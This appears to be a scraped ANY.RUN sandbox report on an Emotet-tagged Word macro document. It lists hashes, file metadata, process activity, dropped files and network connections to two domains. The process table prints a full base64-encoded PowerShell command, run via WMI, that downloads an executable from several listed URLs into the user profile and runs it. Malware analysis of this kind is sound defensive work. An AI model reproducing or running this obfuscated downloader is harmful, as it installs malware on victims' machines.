analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

TmcIhsAzJiVyCRvsBmPUIurkYEHKZm

Full analysis: https://app.any.run/tasks/2ac412ff-a791-4d51-b76d-3326cb6478bb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 17:40:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Small, Subject: Wall, Author: Ford Walter, Keywords: Soft, Comments: structure, Template: Normal.dotm, Last Saved By: Chad Koelpin, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 17:49:00 2019, Last Saved Time/Date: Wed Oct 9 17:49:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5:

9D990A8755C6C57383DDF1DADBB9672E

SHA1:

89A2A1F10B2F7E61670DB0FA12B91633CE5536FD

SHA256:

2F7C65DDCF0040BCEDF508523B6E8147E00C2D190D31FBE4AA884FB36BFA4A16

SSDEEP:

6144:lRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46die:lRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2988)

    • Executed via WMI

      • powershell.exe (PID: 2988)

    • Creates files in the user directory

      • powershell.exe (PID: 2988)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2700)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2700)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Schroeder
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 205
Paragraphs: 1
Lines: 1
Company: Schmidt - Auer
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 176
Words: 30
Pages: 1
ModifyDate: 2019:10:09 16:49:00
CreateDate: 2019:10:09 16:49:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Chad Koelpin
Template: Normal.dotm
Comments: structure
Keywords: Soft
Author: Ford Walter
Subject: Wall
Title: Small
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2700"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\TmcIhsAzJiVyCRvsBmPUIurkYEHKZm.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2988powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADEANgA1AGIAOAAwADAANAAyADAAPQAnAGMAMgA1AGIANwAwADcANgA4AGMAOAAnADsAJAB4ADMAeABjADkAOQA1ADQAOAAwAHgAIAA9ACAAJwAyADQAOQAnADsAJAB4ADUANQAxADEANwAwADcANwA2ADUAYgA9ACcAYgA4AHgAMQBiADgAMABjADAANwAyADIAMAAnADsAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAAzAHgAYwA5ADkANQA0ADgAMAB4ACsAJwAuAGUAeABlACcAOwAkAHgAMAAxAGMAMgAwADQAMABiADYANQA9ACcAYwAwADgANQAyADAAYwAwAGIANABjACcAOwAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBFAGIAQwBMAGkARQBOAHQAOwAkAGIAMABjADAAOQA5ADIAMAA2ADQAeAAxADAAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAG8AcAByAGUAdAB0AHkAaABhAGkAcgBsAGwAYwAuAGMAbwBtAC8AdwBlAGwAYwBvAG0AZQAyAC8AaQByAGMAWQBkAGoAZQB3AFAAdAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AegBoAGkAegBhAGkAcwBpAGYAYQBuAGcALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAGYAZQBuAGMAZQAvAGQATABqAFAAVAB6AHkAbAAvAEAAaAB0AHQAcAA6AC8ALwBmAHUAdAB1AHIAZQAtAG0AYQBpAG4AdABlAG4AYQBuAGMAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEQARABiAFYAYwBMAFAAdgB6AC8AQABoAHQAdABwAHMAOgAvAC8AaQBtAHQAZwBsAG8AYgBhAGwAcwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwA1ADMAZQBmADAAdQA3AGYAbABfADQAeQAzAG0AeABtAGIAMABmAC0ANQA0AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdgBhAHMAdAB1AHYAaQBkAHkAYQBhAHIAYwBoAGkAdABlAGMAdABzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBNAFgAUQB4AGcARgBaAEUALwAnAC4AIgBTAFAATABgAGkAdAAiACgAJwBAACcAKQA7ACQAYwA2ADAAMAAwADkAMwAzADYANwAxADAAPQAnAGMAOQAwADkANwA1ADcANgAwADAAMAAwADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAMAAwADAAMQAwADkANgA4ADQAOAAgAGkAbgAgACQAYgAwAGMAMAA5ADkAMgAwADYANAB4ADEAMAApAHsAdAByAHkAewAkAGMAYgA3ADAAeAAzADkAYgA2ADAAOAA5AHgALgAiAGQAbwBXAE4ATABgAG8AYQBgAEQARgBJAGwARQAiACgAJABiADAAMAAwADEAMAA5ADYAOAA0ADgALAAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQA7ACQAYwA2AHgAMAAwAHgAMAB4AGMANwAwAD0AJwB4ADMANAA1AHgAeAAxADIAYwA5ADYAMAAwACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBjAGIAMgBiADAANgAwAHgAMAAxAGMAKQAuACIATABFAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADIANgA0ADAAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABjAGMAYgAyAGIAMAA2ADAAeAAwADEAYwApADsAJAB4ADAAOQB4AHgANgBiAGMAYgA1ADAAeAA4AD0AJwBjADgAOAAzADcANgAzADAAMABiAHgAJwA7AGIAcgBlAGEAawA7ACQAYgBiADAAOQAyAGIAeAA3AHgAMAAwADgAMgA9ACcAYgBjAGMANwAzADcAOQBiADEAMAAwADQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwAwAHgAOAAyADgAeAA2AGIAMAA3AD0AJwBjADAAMAA4ADMAMwAwADIAMAAwADQANgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 387
Read events
903
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD02.tmp.cvr
MD5:
SHA256:
2988powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\50LN3J5HRWZPKZ50SIBA.temp
MD5:
SHA256:
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$cIhsAzJiVyCRvsBmPUIurkYEHKZm.docpgc
MD5:6CAC675EBE2F55304FDD2F866A8006D2
SHA256:5EAF805B5E31A532FBDA4D947D24B2971F7A4AAEB3D359CB11BFFD3CCB582F3B
2700WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A66BB91C.wmfwmf
MD5:57AAD5B33AAE8A73577D56CD5BA0564D
SHA256:C58FD241DBA86BAD217B20D9F479575C4A752C475655511F805C8E2DE744BD27
2700WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DB9D409.wmfwmf
MD5:2A55CC35AC08E9FD5BBF798C95415D89
SHA256:48FF39759516E62075428857249B721BF10C4A35B865AA64E523C5029114D06D
2700WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72F58E6D.wmfwmf
MD5:34C9364AE50F48CECD0850BF3BA94072
SHA256:D2B8AFF3EEDCDC3703729D17F45A569BBAAC40C2675F05409B319C92D58ED6BB
2700WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95DCA98A.wmfwmf
MD5:1072F06BE6E1D176E71E0052BF0E20D0
SHA256:486EF451450F2D936FA195438807CC0EF804335F85690691B5EBA8B038DB8A7B
2700WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C45385F4.wmfwmf
MD5:C67BE3EFE8EFB93BE36C4A417A612093
SHA256:A06C0C8F597584BDC5E59AEEEDE1B5151D9726C97ACB23481E881209A3972033
2700WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1CC5A76.wmfwmf
MD5:49C5D718F641C17D725BD20C4DE3C461
SHA256:C957EBE630668E014AB6BA4346E6F5368873D72E3280405D61395E926EE6A0F0
2700WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7E2EA28.wmfwmf
MD5:74BDE68E29D389104763216CCA513FA3
SHA256:0755F2494EBA3CDFD0617FA5247B73F0AC82A5F8B637E3FF6B3E168EB69C6720
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2988
powershell.exe
47.110.40.3:443
www.zhizaisifang.com
CN
unknown
2988
powershell.exe
45.56.100.50:443
www.soprettyhairllc.com
Linode, LLC
US
unknown
2988
powershell.exe
45.56.100.50:80
www.soprettyhairllc.com
Linode, LLC
US
unknown

DNS requests

Domain
IP
Reputation
www.soprettyhairllc.com
  • 45.56.100.50
unknown
www.zhizaisifang.com
  • 47.110.40.3
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
TmcIhsAzJiVyCRvsBmPUIurkYEHKZm